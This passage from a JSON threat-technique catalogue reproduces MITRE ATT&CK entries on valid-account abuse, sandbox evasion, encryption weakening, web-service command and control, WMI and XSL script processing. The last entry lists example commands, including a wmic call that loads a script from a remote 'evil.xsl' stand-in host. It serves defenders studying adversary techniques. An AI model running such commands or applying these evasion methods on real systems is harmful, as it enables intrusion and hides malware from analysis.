"description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup> Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.<sup>[[Microsoft AD Accounts](https://app.tidalcyber.com/references/df734659-2441-487a-991d-59064c61b771)]</sup>\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or password reuse, allowing access to privileged resources of the domain.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1078.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb",
"value": "Domain Accounts"
},
{
"description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1078.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c",
"value": "Local Accounts"
},
{
"description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup>\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
},
{
"dest-uuid": "3c4a2f3a-5877-4a27-a417-76318523657e",
"type": "similar"
},
{
"dest-uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd",
"type": "similar"
},
{
"dest-uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb",
"type": "similar"
},
{
"dest-uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c",
"type": "similar"
}
],
"uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406",
"value": "Valid Accounts"
},
{
"description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://app.tidalcyber.com/technique/4462ce9d-0a5a-427d-8160-7b307b50cfbd) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. <sup>[[objective-see 2017 review](https://app.tidalcyber.com/references/26b757c8-25cd-42ef-bef2-eb7a28455d57)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "0c81e13a-3608-4171-8075-9f70b2934028",
"value": "Video Capture"
},
{
"description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a), [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea), and [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.<sup>[[McAfee Virtual Jan 2017](https://app.tidalcyber.com/references/a541a027-733c-438f-a723-6f7e8e6f354c)]</sup> In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.<sup>[[Unit 42 OilRig Sept 2018](https://app.tidalcyber.com/references/84815940-b98a-4f5c-82fe-7d8bf2f51a09)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1497.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "026c9281-07f1-4358-96d3-151fed76b1fe",
"value": "System Checks"
},
{
"description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://app.tidalcyber.com/technique/e54bdb49-6039-4048-9be6-657a7ff3e071) to avoid analysis and scrutiny.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.<sup>[[Revil Independence Day](https://app.tidalcyber.com/references/d7c4f03e-7dc0-4196-866b-c1a8eb943f77)]</sup><sup>[[Netskope Nitol](https://app.tidalcyber.com/references/94b5ac75-1fd5-4cad-a604-2b09846eb975)]</sup> Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions in order to delay execution (while also potentially overloading analysis environments with junk data).<sup>[[Joe Sec Nymaim](https://app.tidalcyber.com/references/fe6ac288-1c7c-4ec0-a709-c3ca56e5d088)]</sup><sup>[[Joe Sec Trickbot](https://app.tidalcyber.com/references/f5441718-3c0d-4b26-863c-24df1130b090)]</sup>\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.<sup>[[ISACA Malware Tricks](https://app.tidalcyber.com/references/a071bf02-066b-46e6-a554-f43d0c170807)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1497.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "0ca01a9e-571e-4b17-a84d-23e9ce39b073",
"value": "Time Based Evasion"
},
{
"description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks <sup>[[Sans Virtual Jan 2016](https://app.tidalcyber.com/references/5d3d567c-dc25-44c1-8d2a-71ae00b60dbe)]</sup> , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro <sup>[[Unit 42 Sofacy Nov 2018](https://app.tidalcyber.com/references/1523c6de-8879-4652-ac51-1a5085324370)]</sup> or waiting for a user to double click on an embedded image to activate.<sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1497.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "cb268bcf-3c2f-4583-94e3-7c9f0893e52f",
"value": "User Activity Based Checks"
},
{
"description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.<sup>[[Unit 42 Pirpi July 2015](https://app.tidalcyber.com/references/42d35b93-2866-46d8-b8ff-675df05db9db)]</sup>\n\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
},
{
"dest-uuid": "026c9281-07f1-4358-96d3-151fed76b1fe",
"type": "similar"
},
{
"dest-uuid": "0ca01a9e-571e-4b17-a84d-23e9ce39b073",
"type": "similar"
},
{
"dest-uuid": "cb268bcf-3c2f-4583-94e3-7c9f0893e52f",
"type": "similar"
}
],
"uuid": "63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8",
"value": "Virtualization/Sandbox Evasion"
},
{
"description": "Adversaries disable a network devices dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba)). <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1600.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f413afa2-406d-4e8e-a12c-5f1b8ef05d8a",
"value": "Disable Crypto Hardware"
},
{
"description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) introduced to the system through [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to change the configuration of the device. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1600.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "aa6595d5-1b2e-45a8-8caf-b0968aeab2ba",
"value": "Reduce Key Space"
},
{
"description": "Adversaries may compromise a network devices encryption capability in order to bypass encryption that would otherwise protect data communications. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba), and [Disable Crypto Hardware](https://app.tidalcyber.com/technique/f413afa2-406d-4e8e-a12c-5f1b8ef05d8a), an adversary can negatively effect and/or eliminate a devices ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "f413afa2-406d-4e8e-a12c-5f1b8ef05d8a",
"type": "similar"
},
{
"dest-uuid": "aa6595d5-1b2e-45a8-8caf-b0968aeab2ba",
"type": "similar"
}
],
"uuid": "8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4",
"value": "Weaken Encryption"
},
{
"description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1102.002"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "f8a4c7ee-074b-4bfc-95be-43d91756b73c",
"value": "Bidirectional Communication"
},
{
"description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1102.001"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "faeec22d-dff4-496f-9c7e-14c4f2c8d054",
"value": "Dead Drop Resolver"
},
{
"description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1102.003"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "9ff640ed-572e-4adc-bdc6-234a9e8ef36b",
"value": "One-Way Communication"
},
{
"description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "f8a4c7ee-074b-4bfc-95be-43d91756b73c",
"type": "similar"
},
{
"dest-uuid": "faeec22d-dff4-496f-9c7e-14c4f2c8d054",
"type": "similar"
},
{
"dest-uuid": "9ff640ed-572e-4adc-bdc6-234a9e8ef36b",
"type": "similar"
}
],
"uuid": "a729feee-8e21-444e-8eea-2ec595b09931",
"value": "Web Service"
},
{
"description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM) and [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) (WinRM).<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup> Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup><sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup>\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. <sup>[[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)]</sup> <sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "c37795d9-8970-461f-9491-3086d6b4b69a",
"value": "Windows Management Instrumentation"
},
{
"description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. <sup>[[Microsoft XSLT Script Mar 2017](https://app.tidalcyber.com/references/7ff47640-2a98-4a55-939a-ab6c8c8d2d09)]</sup>\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://app.tidalcyber.com/technique/8811114c-a0cf-479c-b95d-c036467749e3), the Microsoft common line transformation utility binary (msxsl.exe) <sup>[[Microsoft msxsl.exe](https://app.tidalcyber.com/references/a25d664c-d109-466f-9b6a-7e9ea8c57895)]</sup> can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. <sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup> Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. <sup>[[Reaqta MSXSL Spearphishing MAR 2018](https://app.tidalcyber.com/references/927737c9-63a3-49a6-85dc-620e055aaf0a)]</sup> Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\nCommand-line examples:<sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup><sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\n* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) to invoke JScript or VBScript within an XSL file.<sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup> This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) provided they utilize the /FORMAT switch.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\nCommand-line examples:<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup><sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup>\n\n* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "4eb755e6-41f1-4c92-b14d-87a61a446258",
"value": "XSL Script Processing"
}
],
"version": 1
}